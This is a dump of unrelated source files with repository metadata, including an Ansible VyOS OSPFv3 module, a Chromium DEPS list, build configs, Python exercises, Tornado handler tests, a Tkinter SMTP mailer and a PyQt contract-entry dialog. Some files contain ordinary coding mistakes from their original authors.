# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
# Using gathered
#
# Before state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Gather ospfv3 routes config with provided configurations
vyos.vyos.vyos_ospfv3:
config:
state: gathered
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# "gathered": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using deleted
#
# Before state
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Delete attributes of ospfv3 routes.
vyos.vyos.vyos_ospfv3:
config:
state: deleted
#
#
# ------------------------
# Module Execution Results
# ------------------------
#
# "before": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
# "commands": [
# "delete protocols ospfv3"
# ]
#
# "after": {}
# After state
# ------------
# vyos@192# run show configuration commands | grep ospfv3
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
type: dict
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
description: The resulting configuration model invocation.
returned: when changed
type: dict
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample:
- "set protocols ospf parameters router-id 192.0.1.1"
- "set protocols ospfv3 area 2 range '2001:db10::/32'"
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.vyos.vyos.plugins.module_utils.network.vyos.argspec.ospfv3.ospfv3 import (
Ospfv3Args,
)
from ansible_collections.vyos.vyos.plugins.module_utils.network.vyos.config.ospfv3.ospfv3 import (
Ospfv3,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=Ospfv3Args.argument_spec,
required_if=required_if,
supports_check_mode=True,
mutually_exclusive=mutually_exclusive,
)
result = Ospfv3(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
14955d30fe26123e3716725167c4d68ad49205a2 | e76ea38dbe5774fccaf14e1a0090d9275cdaee08 | /src/cc/DEPS | 4e1cc74d6cc126e06e3aa1337ee58dc83ccb80ad | [
"BSD-3-Clause"
] | permissive | eurogiciel-oss/Tizen_Crosswalk | efc424807a5434df1d5c9e8ed51364974643707d | a68aed6e29bd157c95564e7af2e3a26191813e51 | refs/heads/master | 2021-01-18T19:19:04.527505 | 2014-02-06T13:43:21 | 2014-02-06T13:43:21 | 16,070,101 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 561 | include_rules = [
"+gpu/GLES2",
"+gpu/command_buffer/client/context_support.h",
"+gpu/command_buffer/common/gpu_memory_allocation.h",
"+gpu/command_buffer/common/mailbox.h",
"+media",
"+skia/ext",
"+third_party/skia/include",
"+third_party/khronos/GLES2/gl2.h",
"+third_party/khronos/GLES2/gl2ext.h",
"+ui/events/latency_info.h",
"+ui/gfx",
"+ui/gl",
# DO NOT ADD ANY NEW WEBKIT HEADERS TO THIS LIST.
# TODO(danakj): Drop dependencies on WebKit Platform API from cc.
"+third_party/WebKit/public/platform/WebGraphicsContext3D.h",
]
| [
"[email protected]"
] | ||
7b2a0da5898ff8cc6de859b91194a6f1fd42975e | 03534ce46ccb4d82e7752cac264884090c16ae1f | /PyBind11/config.py | a61a9b2d3e787f538b9046e074857e84ede13092 | [] | no_license | alex-v-dev/dependencies | 0ca2a67b97bb9403fa973d4b0a9f34f98694bcdd | 11307514feccd38eeda66c9f0b83194358ffc956 | refs/heads/master | 2023-07-04T22:49:52.940631 | 2021-06-14T13:34:27 | 2021-06-14T13:34:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | {
"downloads" : [
"https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
],
"url" : "https://pybind11.readthedocs.io",
"license" : "LICENSE",
"dependencies" : [ "Python" ],
"environment" : {
"PATH" : "{buildDir}/bin:$PATH",
"LD_LIBRARY_PATH" : "{buildDir}/lib",
},
"commands" : [
"cmake"
" -D CMAKE_INSTALL_PREFIX={buildDir} ."
" -D PYBIND11_TEST=0",
"make install",
],
"manifest" : [
"include/pybind11",
],
}
| [
"[email protected]"
] | |
089de6e71f93ea67d7b8693f6b0221acef7db5d3 | 20cc35cb819d988d35d25ae942d0ecc9fe7bc726 | /Prac_03/word_generator_prac_three.py | 252cd137d3a0b982f809d37432661bd9d8b0abde | [] | no_license | LukeElliman/Practicals | 1272b51e9ef45f27dcb31f7d1238a429e14f3d15 | f9de0adff1616e4b797b96f83fa1869790a0492f | refs/heads/master | 2023-05-05T21:42:45.922665 | 2021-05-23T23:36:08 | 2021-05-23T23:36:08 | 341,446,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,608 | py | """
CP1404/CP5632 - Practical
Random word generator - based on format of words
Another way to get just consonants would be to use string.ascii_lowercase
(all letters) and remove the vowels.
"""
import random
VOWELS = "aeiou"
CONSONANTS = "bcdfghjklmnpqrstvwxyz"
VALID_INPUT = "cv"
def main():
#User input
valid_input = False
while not valid_input:
word_format = str(input("Enter c's for consonant and v's for vowels: ")).lower()
valid_input = is_valid_format(word_format)
word = word_generator(word_format)
print(word + "\n")
#Random
number_of_letters = int(input("How many letters do you want? "))
letters = "cv"
word_format = "".join(random.choice(letters) for i in range(number_of_letters))
word = word_generator(word_format)
print(word)
def is_valid_format(user_input):
"""Checks if input is valid"""
valid = False
valid_character_count = 0
for each_character in user_input:
if each_character not in VALID_INPUT:
valid_character_count += 1
if valid_character_count > 0:
print("Your input must only be c's and v's")
valid_character_count = 0
elif len(user_input) <= 0:
print("Your input must have more then 0 characters")
else:
print("Valid input \n")
valid = True
return valid
def word_generator(user_input):
"""Turns the cv input into words"""
word = ""
for kind in user_input:
if kind == "c":
word += random.choice(CONSONANTS)
else:
word += random.choice(VOWELS)
return word
main() | [
"[email protected]"
] | |
497e239e4a4996a03027feed630c538b6b031e56 | 493fcf4b7eb61a00a51864ba2b3544541dee2935 | /labman/gui/test/test_study.py | b82f7d7b999379932f6bcd0d4d743a94ba366e7a | [
"BSD-3-Clause"
] | permissive | antgonza/labman | d56ab55debdbea4024e12b6e84625b5a472fdbe2 | c3bb7a15cbfdbbf60a7b2b176fff207f99af0002 | refs/heads/master | 2021-05-11T16:09:12.890965 | 2019-04-08T23:29:09 | 2019-04-08T23:29:09 | 117,754,098 | 0 | 0 | BSD-3-Clause | 2019-03-31T20:38:09 | 2018-01-16T23:10:41 | Python | UTF-8 | Python | false | false | 3,280 | py | # ----------------------------------------------------------------------------
# Copyright (c) 2017-, labman development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import main
from tornado.escape import json_decode
from labman.gui.testing import TestHandlerBase
class TestStudyHandlers(TestHandlerBase):
def test_get_study_list_handler(self):
response = self.get('/study_list')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'data': [
[1, 'Identification of the Microbiomes for Cannabis Soils',
'Cannabis Soils', '[email protected]', 27]]}
self.assertEqual(obs, exp)
def test_get_study_handler(self):
response = self.get('/study/1/')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'study_id': 1,
'study_title': 'Identification of the Microbiomes for '
'Cannabis Soils',
'total_samples': 27}
self.assertEqual(obs, exp)
# Test non-existent study
response = self.get('/study/400/')
self.assertEqual(response.code, 404)
def test_get_study_samples_handler(self):
response = self.get('/study/1/samples')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200',
'1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190',
'1.SKD7.640191', '1.SKD8.640184', '1.SKD9.640182',
'1.SKM1.640183', '1.SKM2.640199']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB1')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=1.64')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKD1.640179', '1.SKM1.640183']
self.assertEqual(obs, exp)
# test non-existent study
response = self.get('/study/400/sample_search')
def test_get_study_summary_handler(self):
response = self.get('/study/1/summary')
self.assertEqual(response.code, 200)
self.assertNotEqual(response.body, '')
response = self.get('/study/1000/summary')
self.assertEqual(response.code, 404)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1a728171fa0d72923f75ff0a93d3da29aad4725e | 4476597f6af6b9cd4614bf558553a7eb57c9f993 | /io/email-send.py | b0c8e5b3defd2e2685124e52af398dd84e39b324 | [] | no_license | zhengziqiang/mypython | 07dff974f475d1b9941b33518af67ece9703691a | 7a2b419ff59a31dc937666e515490295f6be8a08 | refs/heads/master | 2021-07-14T20:01:34.231842 | 2017-04-19T01:18:25 | 2017-04-19T01:18:25 | 56,583,430 | 3 | 1 | null | 2020-07-23T11:46:35 | 2016-04-19T09:26:39 | Python | UTF-8 | Python | false | false | 3,529 | py | from Tkinter import *
from smtplib import *
import string
import tkMessageBox as mes
class loginPage(object):
def __init__(self,master,info='Mail Send System'):
self.master=master
self.mainlabel=Label(master,text=info,justify=CENTER)
self.mainlabel.grid(row=0,columnspan=3)
self.user=Label(master,text='username',borderwidth=2)
self.user.grid(row=1,sticky=W)
self.pwd=Label(master,text='passwd',borderwidth=2)
self.pwd.grid(row=2,sticky=W)
self.userEntry=Entry(master)
self.userEntry.grid(row=1,column=1,columnspan=2)
self.userEntry.focus_set()
self.pwdEntry=Entry(master,show='*')
self.pwdEntry.grid(row=2,column=1,columnspan=1)
self.loginButton=Button(master,text='login',borderwidth=2,command=self.login)
self.loginButton.grid(row=3,column=1)
self.clearButton=Button(master,text='Clear',borderwidth=2,command=self.clear)
self.clearButton.grid(row=3,column=2)
def login(self):
self.username=self.userEntry.get().strip()
self.passwd=self.pwdEntry.get().strip()
if len(self.username) ==0 or len(self.passwd)==0 or '@' not in self.username:
mes.showwarning('warning','passwd or username is not right')
self.clear()
self.userEntry.focus_set()
return
self.get_smtp()
self.connect()
def connect(self):
'this method will try to connect to the smtp server according to the current user'
HOST='smtp' + self.smtp + '.com'
try:
self.mysmtp=SMTP(HOST)
self.mysmtp.login(self.username,self.passwd)
except Exception, e:
mes.showerror('connecting error','%s'%e)
return
self.mySendMail=sendMail(self.master,self.mysmtp,self.username)
def clear():
self.userEntry.delete(0,END)
self.pwdEntry.delete(0,END)
def get_smtp(self):
'this method try to obtain the smtp host according the user account'
firstSplit=self.username.split('@')[1]
self.smtp=firstSplit.split('.')[0]
class sendMail(object):
def __init__(self,master,smtp='',sender=''):
self.smtp=smtp
self.sender=sender
self.sendPage=Toplevel(master)
self.sendToLabel = Label(self.sendPage,text='send to:')
self.sendToLabel.grid()
self.sendToEntry = Entry(self.sendPage)
self.sendToEntry.grid(row=0,column=1)
self.subjectLabel=Label(self.sendPage,text='subject:')
self.subjectLabel.grid(row=1,column=0)
self.subjectEntry=Entry(self.sendPage)
self.subjectEntry.grid(row=1,column=1)
self.fromTolabel=Label(self.sendPage,text='from to')
self.fromTolabel.grid(row=2,column=0)
self.fromToAdd=Label(self.sendPage,text=self.sender)
self.fromToAdd.grid(row=2,column=1)
self.sendText=Text(self.sendPage)
self.sendText.grid(row=3,column=0,columnspan=2)
self.newButton=Button(self.sendPage,text='new mail',command=self.newMail)
self.newButton.grid(row=4,column=1)
def getMailInfo(self):
self.sendToAdd=self.sendToEntry.get().strip()
self.subjectInfo=self.subjectEntry.get().strip()
self.sendTextInfo=self.sendText.get(1.0.END)
def sendMail(self):
self.getMailInfo()
body=string.join(("From: %s" % self.sender, "To: %s" % self.sendToAdd, "Subject: %s" % self.subjectInfo, "", self.sendTextInfo), "\r\n")
try:
self.smtp.sendmail(self.sender,[self.sendToAdd],body)
except Exception as e:
mes.showerror("send failure:","%s"%e)
mes.showinfo('Prompt','success')
def newMail(self):
self.sendToEntry.delete(0,END)
self.subjectEntry.delete(0,END)
self.sendText.delete(1,END)
if __name__=='__main__':
root=Tk()
root.title('simple mail send system')
mylogin=loginPage(root)
mainloop()
| [
"[email protected]"
] | |
580123fccf31e7c332168aeb8fe195413662dc0f | 8aa50378af42f325083be548baaf78b4dbf619ab | /OpenCVTest/ReadWebMFile/read_n_save_to_video.py | cb193792096e706e0ef3c655661e388c76d2d982 | [] | no_license | jamescfli/PythonTest | 35919a6671b3d85a0f0212ea6da8baefbd5fcbe0 | 87c4092b046fba45e3e98f03944c17edde11b8b1 | refs/heads/master | 2021-01-20T02:44:25.963174 | 2017-07-01T15:58:32 | 2017-07-01T15:58:32 | 62,287,876 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | import cv2
# video_filepath = './video_clips/b.mp4' # no problem for .mp4 in general, but this one does not work
# video_filepath = './video_clips/b.webm'
# video_filepath = './video_clips/test.webm'
video_filepath = './video_out/b_640x1280_15fps.mp4'
# video_filepath = './video_out/b_640x1280_60fps.mp4'
# .. Issue: VIDEOIO(cvCreateFileCapture_AVFoundation (filename)): raised unknown C++ exception!
print("loading {}".format(video_filepath))
cap = cv2.VideoCapture(video_filepath)
# cap = cv2.VideoCapture(video_filepath, cv2.CAP_FFMPEG) # after brew install ffmpeg
print("capture finished")
output_shape = (480, 960)
# const char* filename, int fourcc, double fps, CvSize frame_size, int is_color=1 (gray or color)
# forcecc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')
# forcecc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
forcecc = cv2.VideoWriter_fourcc(*'MPEG')
out = cv2.VideoWriter('./video_out/output.avi', forcecc, 30.0, output_shape[::-1], isColor=True)
print('finish init video writer')
frame_counter = 0
while (cap.isOpened()):
ret, frame = cap.read()
if ret:
frame_counter += 1
out.write(frame)
else:
break
print frame_counter # 2473 frames for b.mp4
cap.release()
out.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
3bb0200c41571bb5e28f148a52ee99b29915d82b | 8b5b782e06dd00bfc05c789ea3d60b4f10d78784 | /dlgcontractdata.py | 4a6dd4ab74ff3bae6eb8a9f76eff1f121f21c39c | [] | no_license | igrekus/shipment | 471744fbbf35900efb8aee4cce2b0ebe9e13bf3f | b69f9efa213988e5445c90219a4d794fbc53f017 | refs/heads/master | 2021-09-07T14:59:45.181585 | 2018-02-24T13:07:43 | 2018-02-24T13:07:43 | 105,753,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,980 | py | import sys
import const
import datetime
from copy import deepcopy
from comboboxdelegate import ComboBoxDelegate
from contractitem import ContractItem
from dateeditdelegate import DateEditDelegate
from productlistmodel import ProductListModel
from PyQt5 import uic
from PyQt5.QtWidgets import QDialog, QMessageBox, QTableView
from PyQt5.QtCore import Qt, QDate, QModelIndex
from spinboxdelegate import SpinBoxDelegate
class DlgContractData(QDialog):
def __init__(self, parent=None, domainModel=None, uifacade=None, item=None, products=None):
super(DlgContractData, self).__init__(parent)
self.setAttribute(Qt.WA_QuitOnClose)
self.setAttribute(Qt.WA_DeleteOnClose)
# create instance variables
# ui
self.ui = uic.loadUi("DlgContractData.ui", self)
# init instances
self._domainModel = domainModel
self._uiFacade = uifacade
# data members
self._currentItem: ContractItem = item
self.newItem = None
self._productList = list()
if products is not None:
self._productList = deepcopy(products)
self._productModel = ProductListModel(self, self._domainModel)
self.initDialog()
def initDialog(self):
# init widgets
self.ui.tableProduct: QTableView
self.ui.tableProduct.setItemDelegateForColumn(0, ComboBoxDelegate(parent=self.ui.tableProduct,
mapModel=self._domainModel.dicts[
const.DICT_PRODUCT]))
self.ui.tableProduct.setItemDelegateForColumn(1, SpinBoxDelegate(parent=self.ui.tableProduct))
self.ui.tableProduct.setItemDelegateForColumn(3, DateEditDelegate(parent=self.ui.tableProduct))
self.ui.comboClient.setModel(self._domainModel.dicts[const.DICT_CLIENT])
self.ui.tableProduct.setModel(self._productModel)
self._productModel.initModel(self._productList)
# setup signals
self.ui.btnOk.clicked.connect(self.onBtnOkClicked)
self.ui.btnClientAdd.clicked.connect(self.onBtnClientAddClicked)
self.ui.btnProductAdd.clicked.connect(self.onBtnProductAddClicked)
self.ui.btnProductRemove.clicked.connect(self.onBtnProductRemoveClicked)
self.ui.btnNewProduct.clicked.connect(self.onBtnNewProductClicked)
# set widget data
if self._currentItem is None:
self.resetWidgets()
else:
self.updateWidgets()
# adjust UI
self.ui.tableProduct.resizeColumnsToContents()
def updateWidgets(self):
def formatDate(date: datetime.date):
if isinstance(date, datetime.date):
return QDate().fromString(date.isoformat(), "yyyy-MM-dd")
else:
return QDate().fromString("2000-01-01", "yyyy-MM-dd")
self.ui.editIndex.setText(self._currentItem.item_index)
self.ui.comboClient.setCurrentText(self._domainModel.dicts[const.DICT_CLIENT].getData(self._currentItem.item_clientRef))
self.ui.editProject.setText(self._currentItem.item_projCode)
self.ui.editRequestN.setText(self._currentItem.item_requestN)
self.ui.dateRequest.setDate(formatDate(self._currentItem.item_requestDate))
self.ui.editDogozN.setText(self._currentItem.item_dogozName)
self.ui.dateRequest.setDate(formatDate(self._currentItem.item_requestDate))
self.ui.dateDogoz.setDate(formatDate(self._currentItem.item_dogozDate))
self.ui.editDevRequestN.setText(self._currentItem.item_deviceRequestN)
self.ui.editDevRequestCode.setText(self._currentItem.item_deviceRequestCode)
self.ui.editContractN.setText(self._currentItem.item_contractN)
self.ui.dateContract.setDate(formatDate(self._currentItem.item_contractDate))
self.ui.dateSpecReturn.setDate(formatDate(self._currentItem.item_specReturnDate))
self.ui.spinSum.setValue(float(self._currentItem.item_sum)/100)
self.ui.editBillN.setText(self._currentItem.item_billNumber)
self.ui.dateBill.setDate(formatDate(self._currentItem.item_billDate))
self.ui.dateMil.setDate(formatDate(self._currentItem.item_milDate))
self.ui.dateAddLetter.setDate(formatDate(self._currentItem.item_addLetterDate))
self.ui.dateResponse.setDate(formatDate(self._currentItem.item_responseDate))
self.ui.editPaymentN.setText(self._currentItem.item_paymentOrderN)
self.ui.datePayment.setDate(formatDate(self._currentItem.item_paymentDate))
self.ui.dateMatPurchase.setDate(formatDate(self._currentItem.item_matPurchaseDate))
self.ui.datePlanShip.setDate(formatDate(self._currentItem.item_planShipmentDate))
self.ui.dateManufPlan.setDate(formatDate(self._currentItem.item_manufPlanDate))
self.ui.spinShipPeriod.setValue(self._currentItem.item_shipmentPeriod)
self.ui.editInvoiceN.setText(self._currentItem.item_invoiceN)
self.ui.dateInvoice.setDate(formatDate(self._currentItem.item_invoiceDate))
self.ui.editPacklistN.setText(self._currentItem.item_packingListN)
self.ui.datePacklist.setDate(formatDate(self._currentItem.item_packingListDate))
self.ui.editShipNote.setText(self._currentItem.item_shipNote)
self.ui.dateShip.setDate(formatDate(self._currentItem.item_shipDate))
self.ui.checkComplete.setChecked(bool(self._currentItem.item_completed))
self.ui.textContact.setPlainText(self._currentItem.item_contacts)
def resetWidgets(self):
currentDate = QDate().currentDate()
self.ui.editIndex.setText("")
self.ui.comboClient.setCurrentIndex(0)
self.ui.editProject.setText("")
self.ui.editRequestN.setText("")
self.ui.dateRequest.setDate(currentDate)
self.ui.editDogozN.setText("")
self.ui.dateDogoz.setDate(currentDate)
self.ui.editDevRequestN.setText("")
self.ui.editDevRequestCode.setText("")
self.ui.editContractN.setText("")
self.ui.dateContract.setDate(currentDate)
self.ui.dateSpecReturn.setDate(currentDate)
self.ui.spinSum.setValue(0)
self.ui.editBillN.setText("")
self.ui.dateBill.setDate(currentDate)
self.ui.dateMil.setDate(currentDate)
self.ui.dateAddLetter.setDate(currentDate)
self.ui.dateResponse.setDate(currentDate)
self.ui.editPaymentN.setText("")
self.ui.datePayment.setDate(currentDate)
self.ui.dateMatPurchase.setDate(currentDate)
self.ui.datePlanShip.setDate(currentDate)
self.ui.dateManufPlan.setDate(currentDate)
self.ui.spinShipPeriod.setValue(180)
self.ui.editInvoiceN.setText("")
self.ui.dateInvoice.setDate(currentDate)
self.ui.editPacklistN.setText("")
self.ui.datePacklist.setDate(currentDate)
self.ui.editShipNote.setText("")
self.ui.dateShip.setDate(currentDate)
self.ui.checkComplete.setChecked(False)
self.ui.textContact.setPlainText("")
def verifyInputData(self):
if not self.ui.editIndex.text():
QMessageBox.information(self, "Ошибка", "Введите индекс поставки.")
return False
if self.ui.comboClient.currentData(const.RoleNodeId) == 0:
QMessageBox.information(self, "Ошибка", "Выберите клиента.")
return False
if not self.ui.editProject.text():
QMessageBox.information(self, "Ошибка", "Введите код работы.")
return False
if not self.ui.editRequestN.text():
QMessageBox.information(self, "Ошибка", "Введите номер запроса.")
return False
if not self.ui.editDogozN.text():
QMessageBox.information(self, "Ошибка", "Введите номер ДОГОЗ.")
return False
if self.ui.spinSum.value() <= 0:
QMessageBox.information(self, "Ошибка", "Введите сумму.")
return False
if self.ui.spinShipPeriod.value() <= 0:
QMessageBox.information(self, "Ошибка", "Введите срок поставки.")
return False
if self._productModel.rowCount() == 0:
QMessageBox.information(self, "Ошибка", "Добавьте товары в список.")
return False
else:
ids = self._productModel.getProductIdList()
if len(ids) > len(set(ids)):
QMessageBox.information(self, "Ошибка", "Товары в списке не должны повторяться.")
return False
# TODO: move to the model
for i in range(self._productModel.rowCount()):
if self._productModel.data(self._productModel.index(i, 0, QModelIndex()), Qt.DisplayRole).value() == "Все":
# TODO: fix crash on message dismissal
QMessageBox.information(self, "Ошибка", "Выберите товар из списка.")
return False
# TODO: reject dupes in product list
return True
def collectData(self):
# def getDate(strdate):
# return str
id_ = None
if self._currentItem is not None:
id_ = self._currentItem.item_id
completed = False
if self._currentItem is not None:
completed = self._currentItem.item_completed
# TODO: change date formats
self.newItem = ContractItem(id_=id_,
index=self.ui.editIndex.text(),
clientRef=self.ui.comboClient.currentData(const.RoleNodeId),
projCode=self.ui.editProject.text(),
requestN=self.ui.editRequestN.text(),
requestDate=datetime.datetime.strptime(
self.ui.dateRequest.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
dogozName=self.ui.dateDogoz.text(),
dogozDate=datetime.datetime.strptime(
self.ui.dateDogoz.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
deviceRequestN=self.ui.editDevRequestN.text(),
deviceRequestCode=self.ui.editDevRequestCode.text(),
contractN=self.ui.editContractN.text(),
contractDate=datetime.datetime.strptime(
self.ui.dateContract.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
specReturnDate=datetime.datetime.strptime(
self.ui.dateSpecReturn.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
sum=int(self.ui.spinSum.value() * 100),
billNumber=self.ui.editBillN.text(),
billDate=datetime.datetime.strptime(self.ui.dateBill.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
milDate=datetime.datetime.strptime(self.ui.dateMil.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
addLetterDate=datetime.datetime.strptime(
self.ui.dateAddLetter.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
responseDate=datetime.datetime.strptime(
self.ui.dateResponse.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
paymentOrderN=self.ui.editPaymentN.text(),
paymentDate=datetime.datetime.strptime(
self.ui.datePayment.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
matPurchaseDate=datetime.datetime.strptime(
self.ui.dateMatPurchase.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
planShipmentDate=datetime.datetime.strptime(
self.ui.datePlanShip.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
shipmentPeriod=self.ui.spinShipPeriod.value(),
invoiceN=self.ui.editInvoiceN.text(),
invoiceDate=datetime.datetime.strptime(
self.ui.dateInvoice.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
packingListN=self.ui.editPacklistN.text(),
packingListDate=datetime.datetime.strptime(
self.ui.datePacklist.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
shipNote=self.ui.editShipNote.text(),
shipDate=datetime.datetime.strptime(self.ui.dateShip.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
completed=completed,
contacts=self.ui.textContact.toPlainText(),
manufPlanDate=datetime.datetime.strptime(
self.ui.dateManufPlan.date().toString("yyyy-MM-dd"), "%Y-%m-%d"))
self._productList = self._productModel.getProductList()
def getData(self):
return self.newItem, self._productList
def onBtnOkClicked(self):
if not self.verifyInputData():
return
self.collectData()
self.accept()
def onBtnClientAddClicked(self):
self._uiFacade.requestClientAdd(caller=self)
def onBtnProductAddClicked(self):
self._productModel.addProduct(self._domainModel.dicts[const.DICT_PRODUCT].getIdByIndex(1))
def onBtnProductRemoveClicked(self):
if not self.ui.tableProduct.selectionModel().hasSelection():
return
result = QMessageBox.question(self.parent(), "Внимание!",
"Вы хотите удалить выбранную запись?")
if result != QMessageBox.Yes:
return
self._productModel.removeProduct(self.ui.tableProduct.selectionModel().selectedIndexes()[0].row())
def onBtnNewProductClicked(self):
self._uiFacade.requestProductAdd(caller=self)
| [
"[email protected]"
] | |
5ed9622704f875d95003d08b1e22ecbfb53984cd | 99ca151c59afd9c0e7091b6919768448e40f88a2 | /numpy_and_math_error.py | ae3f097ca8ea71aad9e01311276bd6f306b6dfdb | [] | no_license | zainabnazari/Python_note | 1b6a454f6e7b3aca998d87a201823a600ec28815 | 3beb52beb3a0ebe17a6ac8c5695670e9dde59269 | refs/heads/main | 2023-02-10T22:32:33.160428 | 2021-01-12T18:36:54 | 2021-01-12T18:36:54 | 304,724,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #file name: numpy_and_math_error.py
import numpy as np
import math
myarray = np.array([1,2,3])
root = math.sqrt(myarray)
print(root)
"""
Output:
Traceback (most recent call last):
File "numpy_and_math_error.py", line 5, in <module>
root = math.sqrt(myarray)
TypeError: only size-1 arrays can be converted to Python scalars
""" | [
"[email protected]"
] | |
06c1581193edfd27f19dd85b4d1d96492fe96651 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/abc/abc001-100/abc050/a.py | aee99db3e562045ac30ac7a75beb5b1f24ddaa49 | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 114 | py | a, op, b = map(str, input().split())
a = int(a)
b = int(b)
if op == "+":
print(a + b)
else:
print(a - b)
| [
"[email protected]"
] | |
